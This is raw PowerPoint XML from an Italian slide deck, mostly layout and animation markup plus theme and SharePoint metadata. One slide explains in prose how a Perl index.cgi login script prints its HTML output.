          <a:srcRect l="1619" r="11335"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="278381" y="1154214"/>
            <a:ext cx="3940328" cy="3495404"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="252379223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nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="1441">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="14" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1441">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="15" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1441">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>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stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="1441">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="18" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1441">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>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441">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>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1441">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="22" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1441">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>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441">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>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1441">
                                            <p:txEl>
                                              <p:pRg st="6" end="6"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="26" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1441">
                                            <p:txEl>
                                              <p:pRg st="6" end="6"/>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441">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1441">
                                            <p:txEl>
                                              <p:pRg st="8" end="8"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="32" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1441">
                                            <p:txEl>
                                              <p:pRg st="8" end="8"/>
                                            </p:tx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1441">
                                            <p:txEl>
                                              <p:pRg st="8" end="8"/>
                                            </p:txEl>
                                          </p:spTgt>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1441">
                                            <p:txEl>
                                              <p:pRg st="10" end="10"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="36" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1441">
                                            <p:txEl>
                                              <p:pRg st="10" end="10"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="37" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1441">
                                            <p:txEl>
                                              <p:pRg st="10" end="10"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="38" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="39" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="1441">
                                            <p:txEl>
                                              <p:pRg st="12" end="12"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="40" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1441">
                                            <p:txEl>
                                              <p:pRg st="12" end="12"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="41" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1441">
                                            <p:txEl>
                                              <p:pRg st="12" end="12"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="42" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="43" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="1441">
                                            <p:txEl>
                                              <p:pRg st="14" end="14"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="44" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1441">
                                            <p:txEl>
                                              <p:pRg st="14" end="14"/>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1441">
                                            <p:txEl>
                                              <p:pRg st="14" end="1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4" name="Rettangolo 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C94474C4-EB34-530B-834A-AA00555D11B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4405745" y="1119495"/>
            <a:ext cx="4738255" cy="402400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1439" name="Google Shape;1439;p53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714799" y="474832"/>
            <a:ext cx="77040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3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1365850" y="447121"/>
            <a:ext cx="64122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it-IT"/>
              <a:t>Lo script I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>ndex.cgi</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1441" name="Google Shape;1441;p53"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4736844" y="1576007"/>
            <a:ext cx="4026156" cy="2635775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Quicksand"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0"/>
              <a:t>sub </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0" err="1"/>
              <a:t>htmlz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0"/>
              <a:t> {...} definisce la funzione </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0" err="1"/>
              <a:t>htmlz</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="152400" lvl="0" indent="0" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Quicksand"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0"/>
              <a:t>Stampa sullo STDOUT l’intestazione HTML della pagina</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="152400" lvl="0" indent="0" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Quicksand"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0"/>
              <a:t>Se il parametro passato alla funzione è 1 stampa sullo STDOUT “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F99AAA"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Login accettato</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0"/>
              <a:t>”, altrimenti stampa sullo STDOUT “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F99AAA"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Login fallito</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0"/>
              <a:t>”. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="152400" lvl="0" indent="0" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Quicksand"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0"/>
              <a:t>Stampa sullo STDOUT della stringa “ Vorresti un cookie?” e dei tag di chiusura della pagina HTML</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="152400" lvl="0" indent="0" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Quicksand"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0"/>
              <a:t>Invocazione di</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F99AAA"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F99AAA"/>
                </a:solidFill>
              </a:rPr>
              <a:t>htmlz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F99AAA"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0"/>
              <a:t>con argomento il valore restituito dalla funzione login che prende come parametri “username” e “password”. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="152400" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1442" name="Google Shape;1442;p53"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7631947" y="649694"/>
            <a:ext cx="636814" cy="120078"/>
            <a:chOff x="8209059" y="198000"/>
            <a:chExt cx="636814" cy="120078"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1443" name="Google Shape;1443;p53"/>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3"/>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3"/>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Immagine 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0F1C64F-C47B-54D3-996F-41873675F5B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="833" r="21212"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="331100" y="1738618"/>
            <a:ext cx="4225636" cy="1932838"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2805194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nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="1441">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="14" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1441">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="15" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1441">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>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0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="1441">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="18" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1441">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>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1441">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>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stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="1441">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="22" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1441">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>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144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nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="1441">
                                            <p:txEl>
                                              <p:pRg st="6" end="6"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="28" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1441">
                                            <p:txEl>
                                              <p:pRg st="6" end="6"/>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1441">
                                            <p:txEl>
                                              <p:pRg st="6" end="6"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="30" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="31" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="1441">
                                            <p:txEl>
                                              <p:pRg st="8" end="8"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="32" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1441">
                                            <p:txEl>
                                              <p:pRg st="8" end="8"/>
                                            </p:tx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1441">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International Programmers Day XL by Slidesgo">
  <a:themeElements>
    <a:clrScheme name="Simple Light">
      <a:dk1>
        <a:srgbClr val="FFFFFF"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="011635"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="F99AAA"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="F9CAD2"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="F4DC90"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="00CFBE"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="8791FF"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="5863E0"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="011635"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="8492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c1651439-6e46-4f78-9acb-4a905f92618b"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958A34E01316F8439D0AE3BCFE2030F9" ma:contentTypeVersion="8" ma:contentTypeDescription="Creare un nuovo documento." ma:contentTypeScope="" ma:versionID="7afa8779f73d8b71029f7e685c9061fb">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns3="25379ffa-1be3-456e-9b5c-56d073d73bb0" xmlns:ns4="c1651439-6e46-4f78-9acb-4a905f92618b" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="3b99f62623b8448538d4c0b99bcb42df" ns3:_="" ns4:_="">
    <xsd:import namespace="25379ffa-1be3-456e-9b5c-56d073d73bb0"/>
    <xsd:import namespace="c1651439-6e46-4f78-9acb-4a905f92618b"/>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379ffa-1be3-456e-9b5c-56d073d73bb0" elementFormDefault="qualified">
    <xsd:import namespace="http://schemas.microsoft.com/office/2006/documentManagement/types"/>
